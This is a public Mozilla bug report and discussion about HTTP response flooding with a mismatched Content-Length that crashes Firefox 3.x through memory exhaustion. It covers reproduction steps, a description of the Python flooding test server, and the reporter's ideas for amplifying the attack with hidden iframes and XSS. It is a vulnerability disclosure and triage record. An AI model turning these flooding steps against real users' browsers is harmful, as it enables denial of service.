Closed Bug 557545 Opened 14 years ago Closed 13 years ago

HTTP Response flooding causes XUL.dll to crash with possibility of remote code execution

Categories

(Core :: Networking: HTTP, defect)

x86
All
defect
Not set
critical

Tracking

()

RESOLVED DUPLICATE of bug 687256
Tracking Status
blocking2.0 --- -

People

(Reporter: saratg, Unassigned)

References

Details

(Whiteboard: [sg:moderate][critsmash:investigating][oom])

Attachments

(6 files)

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5
Build Identifier: Mozilla 3.0.* - 3.6.*

An attacker can flood the browser with http response packets in response to a legitimate http request. This takes advantage of the http keep-alive and falls under expected behavior. However, depending on the type of payload (response) the browser can be flooded with responses resulting in XUL.dll crash, possibly due to data segment corruption resulting in read access violation.

The exact location of crash varies with type of payload and hence could possibly be manipulated to load target location in to eax register and invoking the memory address. Test Results:



Reproducible: Always

Steps to Reproduce:
1. Open a page vulnerable to http response flooding
2. Keep the page open for a few minutes
3. Browser crashes with xul.dll crash
Actual Results:  
Small payload: Required about 1.2 million packets to crash the browser, approx. 2 minutes over a good network

Large Payload: Required about 1300 packets to crash the browser.

Access violation - code c0000005 

The attack can be intensified using XSS, posting links on social networking sites etc. The end user does not notice the response flooding when the packets are flooded to hidden iFrames within a page.


Expected Results:  
Mozilla should ideally close listening port or drop connection when flooded with http response. This behavior can be observed in other browsers.

Does not require a web server for http response.
Sample code and test payload can be provided, if required.
Could you please attach the sample code and test case you mentioned, and/or provide a URL to one that's currently live?  Thanks!
The sample code, or a crash that was caused by it, will be required to do anything with this bug, I think. If the crash is caused by out-of-memory exceptions, that is considered a DOS attack and we can open up the bug. If you have crafted a response so that it causes a crash that isn't related to OOM failing, I'd really love to see what's going on.
Whiteboard: [sg:needinfo]
Attached file Test Html Page
Open the test.html file. Modify "localhost" in line 21 and replace it with IP address or url of the server where server.py script will be running.
Attached file Client Code
Open Client.py. Modify line 10 and replace harcoded location of test.html to the actual location of test.html on test bed.
Attached file Flooding Server
Attached test code and payload used for testing. Payload is randomly chosen text. All scripts written in python. The script is a test case for response flooding using iFrames.

Please follow instructions below to use the attached sample code:

1) Open the test.html file. Modify "localhost" in line 21 and replace it with IP address or url of the server where server.py script will
be running. DO NOT REMOVE the "44445" port number after localhost.

2) Open Client.py. Modify line 10 and replace harcoded location of test.html to the actual location of test.html on test bed.

3) Launch Server.py. Server listens on port 44445.

4) Launch Client.py. The client is hardcoded to run on port 44449

5) Open Firefox and type url : http://<ip>:44449/ . 

6) Stay on the page displayed by the above url for some time ( wait time depends on network ).

7) there is a live test server at url http://tinyurl.com/ybkyp8l . However, this server won't be up for too long. The attached code is the same code that is deployed on the test server.

HTH
Whiteboard: [sg:needinfo] → [See Attachments]
Whiteboard: [See Attachments]
Assignee: nobody → sayrer
I let the testcase run in a trunk build in a Windows VM for several minutes but no crash.  sayrer, are you able to reproduce and confirm?  I'd love to get this bug assigned a severity, unhidden, or otherwise resolved.
I had set up a test server in mid west and used the same to crash a browser in west coast, a few days back. Though it took me about 18-20 minutes on an average, due to network connectivity, all test cases were able to reproduce the crash.

Let me know if I can be of any help in reproducing the issue.

~SG
Whiteboard: [sg:critical]
Whiteboard: [sg:critical] → [sg:critical][critsmash:investigating]
I got this to crash once, but I haven't been able to investigate yet.
Blocking 1.9.3 final as it's an sg:crit.
blocking2.0: --- → final+
Anyone run into this crash recently?
Still looking for a way to reproduce here.
This is not a normal crash but more of a crafted attack.
Please use attached files and follow instructions in comment 6 (https://bugzilla.mozilla.org/show_bug.cgi?id=557545#c6) to reproduce the same.
Status: UNCONFIRMED → NEW
Ever confirmed: true
looking at this to see if i can get a stack etc
Whiteboard: [sg:critical][critsmash:investigating] → [sg:critical][critsmash:investigating][critsmash:cant-repro]
Reproduced on Firefox versions 3.6.8 & 3.6.3 using same code attached with this bug.
Debug Info: "Access Violation when reading [00000008]"

Problem signature:
  Problem Event Name:	APPCRASH
  Application Name:	firefox.exe
  Application Version:	1.9.2.3855
  Application Timestamp:	4c48d5ce
  Fault Module Name:	xul.dll
  Fault Module Version:	1.9.2.3855
  Fault Module Timestamp:	4c48d532
  Exception Code:	c0000005
  Exception Offset:	000e825a
so far i was able to crash ones on 3.6.8 and got http://crash-stats.mozilla.com/report/pending/69648e0d-a33c-4972-8efe-dc9192100831 - but it seems that breakpad is not able to process/find this report (?)

Sarath, are you also able crash on the Firefox 3.6.9 Candidate builds (ftp://ftp.mozilla.org/pub/firefox/nightly/3.6.9-candidates/build1/)

Maybe it would be helpful to get a stack via windgb (see https://developer.mozilla.org/en/how_to_get_a_stacktrace_with_windbg) will also try this next.
Reproduced on 3.6.9. Stack trace from windbg attached. 

PS: The port open/close logic could be the root cause for this issue. This crash is a result of flooding of packets to the same port from which request was made. Packet capture does not show any TCP FIN at any point until browser crashes. Expected behavior as seen in other browsers would be to close connection and open new port further traffic.
Attached file Stack trace
Sayrer will try to reproduce this on 3.6.9 as well.
Why is it crashing in our font routines if you're hammering on the network?
Assignee: sayrer → bsmith
I can reproduce this on 3.6.9 and on a recent trunk build. The crash is simpler/more reliable if you ignore Client.py and test.html:

1. python Server.py
2. go to http://<machine-name>:44445
3. wait.
4. If nothing happens after a few minutes, go to 2.

In a debug build, I observed the following assertions. The PushBack assertion is the most common:

###!!! ASSERTION: XPConnect is being called on a scope without a 'Components' property!: 'Error', file c:/Users/brian/Documents/mozi
lla-central/src/js/src/xpconnect/src/xpcwrappednativescope.cpp, line 795

###!!! ASSERTION: PushBack: 'Not Reached', file c:\users\brian\documents\mozilla-central\src\netwerk\protocol\http\nsHttpConnection.
h, line 117
Reply to Daniel Veditz:

I'm not the expert in how the font routine works...but it does look like the font routine is trying to buffer every packet pushed through the open network and crashes when it can't handle anymore. May be a buffer overflow caused by some race condition.

My 2 cents.
Should this move into Core::XPConnect based on comment 21?
Reporter: 

The content-length sent by the server doesn't match the actual length of the content. In this case, the given Content-Length is larger than the length of the content. Consequently, we parse one response which includes the HTTP headers of the following response. Then, we start to parse the next (pipelined) response in the middle of the document. This looks like a HTTP response without a response line or headers.

If we get a response from the server without a HTTP response line or HTTP headers, then we just read that response until the connection is closed, rendering the data as we download it. If the server keeps sending data then we will keep loading/rendering the content until we run out of memory. In 3.6.x we will crash; on my machine the crash has been happening usually in the cycle collector. (I will attack a minidump.) It looks like we realize we are running out of memory and run the cycle collector to free something up, but there is some bug in the cycle collector. In Minefield, mozalloc_abort kills the process.

Now, maybe my out-of-memory problem is masking the true issue that the user is trying to report. I did one time get a crash in code that was kind of similar to the stack trace the user reported. But, the minidump from crash reporter was empty. These empty minidumps seem to be generated when we run out of memory.

So, it seems like there are at least two issues: (1) We shouldn't attempt to retrieve and render gigantic/infinite documents, and (2) Some bug in the cycle collector or some heap corruption that causes the cycle collector to crash in low-memory situations.
This crash isn't the one in the cycle collector. It is in nsAttrAndChildArray::Compact. the call to PR_Realloc fails and we attempt to use mImpl when it is NULL:

    mImpl = static_cast<Impl*>(PR_Realloc(mImpl, (newSize + NS_IMPL_EXTRA_SIZE) * sizeof(nsIContent*)));
    NS_ASSERTION(mImpl, "failed to reallocate to smaller buffer");

    mImpl->mBufferSize = newSize;

Windows reports that the Firefox process is using 1.5GB of memory.

My guess is that many/most/all of the crashes are simply due to NULL pointers returned from malloc and friends.
So the realloc to a *smaller* size is failing in OOM conditions? That's suitably weird. I don't know whether that can be exploitable though.
Attached file Simplified Test Server
1. python Server.py
2. browse to http://<machine-name>:44445
3. Wait for FF to crash.
Brian:

Http Content-Length is a user accessible and modifiable header. If an attacker can manipulate the Content-Length, in the scenario explained above, the browser keeps buffering infinite data until it crashes. Ideally, Content-Length or any user accessible header should only be used as an indication of size of incoming response. If subsequent data/responses coming in through the socket is malformed and does not have the required http headers, shouldn't the browser ideally drop the packets and close the socket as an indication of anomaly?

I haven't confirmed it, but a thought - what if an attacker specifies the content-length to be lesser than the data sent on the socket? Will the browser consider the subsequent stream as a new http response? Do we see any attack vectors here?

~SG
Please ignore the "reporter:" in my previous comment. I was type in a question to Sarath there but I submitted before I typed it.

Sarath: I understand and agree. My question is this: Is there a particular reason why the testcase you submitted was so complicated? I guessed that it was because you were using some fuzzing tool. But, are you expecting that anything other than the Content-Length to be problematic in this test case? In other words, did I over-simplify your test case?

I am not sure what the course of resolution should be. Presumably, we should do something to bail out of rendering/downloading gigantic documents. But, do we also need to go through and fix all the places where we crash when we run out of memory?
Brian: 

The only tool I used was python scripts that I attached and was basically fuzzing the browser using those.

I believe one of the main areas of interest, for me, was the fact that the browser does not honor the content-length as it should be. I vaguely remember a few anomalies w.r.t the content-length, that I had observed, but do not have the complete data set and observation right now. That was the reason why I posed the last point regarding shorter content-length as a question (since i can't verify it with my current setup). If the short content-length is a possible attack, then we could be looking at a newer version of CRLF attack or even an easier way to inject malware, redirect pages etc without  user intervention (these are purely theoretical and I have not confirmed any manually).

I believe, the crash at XUI and other areas are definitely interesting but more of a cascade effect of the main attack point.

From a threat modeling perspective, I would personally focus more on:

1)  correcting the logic used in handling/honoring user manipulatable headers and contents. 

2) Also, I would personally look deeper into the behavior of the socket incase of anomalies (instances like malformed headers, large number of response pakets etc...). In a number of browsers, I observed that ( after invalid content-length or after a specific NUMBER of PACKETS) the socket is closed to ensure that the server can't inject any more arbitrary packets. The socket could also be set to close after a timeout interval. One of the test cases focused on using a larger content-length so that the browser keep waiting for content and in-turn trigger a page refresh from the client side using <meta> http tag and in response serve new payload as response - typically anything malicious.

I haven't looked in to the browser code anytime and cannot comment on what can be the best resolution. Hope this helps to get a better perspective of my attempts to destroy any assumptions that went in to creating the network handler. 

~SG
> (1) We shouldn't attempt to retrieve and render gigantic/infinite documents

How can you tell when you're dealing with one?  Multi-megabyte HTML files are not rare... (not common either, but not rare).

> So the realloc to a *smaller* size is failing in OOM conditions?

I suppose nothing prevents libc from returning a new buffer for realloc() to a smaller size....

The Content-Length thing is pretty much irrelevant to the problem at hand (and would probably be "fixed" by the currently proposed patch for bug 363109.
Whiteboard: [sg:critical][critsmash:investigating][critsmash:cant-repro] → [sg:critical][critsmash:investigating]
In 2.x we die if malloc fails, AFAICT. Why don't we do the same in 1.x? Otherwise, we would have to find all the places that could possibly crash due to malloc failing and fix them all individually. When reproducing this bug I have found at least 3-4 places without even trying and so I assume there are many more.

Otherwise, should this bug be about fixing all those individual crash points?

The strategy of loading content until run out of memory and crash seems ungood but I don't have a solution for it. Maybe in a multi-process world we can put a memory cap (e.g. 512MB) on each child process to make it more difficult to DoS the user's system using techniques like this.
> Why don't we do the same in 1.x?

Because the infrastructure for doing that is new.
Attachment #484081 - Attachment mime type: application/octet-stream → text/plain
AFAICT, FF 4.0 catches all of these in mozalloc_abort. There have been a few of these out-of-memory bugs filed against 3.6.x and at the security meeting it was suggested that all of these should be handled by backporting infallible malloc to 1.9. I need to check with Dan and Jesse to see how that work is being organized.

If that is the strategy we take, then this bug is already fixed, AFAICT, for FF 4.0 and so it isn't a FF 4.0 blocker.
Whiteboard: [sg:critical][critsmash:investigating] → [sg:critical][critsmash:investigating][oom]
Strike comment 34. Not all memory allocations are infallible in 2.0.
Depends on: 427099
No longer depends on: 611123
The end result of this attack are not reliable and should be rated less than "critical" -- it's not something that could be used as a drive-by attack.

Many of the resulting crashes (most? all?) are really due to the large content rather than the network aspect and could be reproduced using a small page self-generating the content through DOM appends, innerHTML, or document.write().
Whiteboard: [sg:critical][critsmash:investigating][oom] → [sg:moderate][critsmash:investigating][oom]
bsmedberg says non-reproducable, I say it's in the wrong component.
Assignee: bsmith → nobody
blocking2.0: final+ → -
Component: Security → Networking: HTTP
Product: Firefox → Core
QA Contact: firefox → networking.http
I am going to resolve this as a dup of 687256 because (a) none of the crashes I experienced were actually in networking code), (b) there isn't anything we can do in networking to fix this bug, and (c) the fuzz testing I suggest in bug 687256 should find (many of) the exploitable bugs that are identifiable with these test cases.
Status: NEW → RESOLVED
Closed: 13 years ago
Resolution: --- → DUPLICATE
Group: core-security → core-security-release
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Created:
Updated:
Size: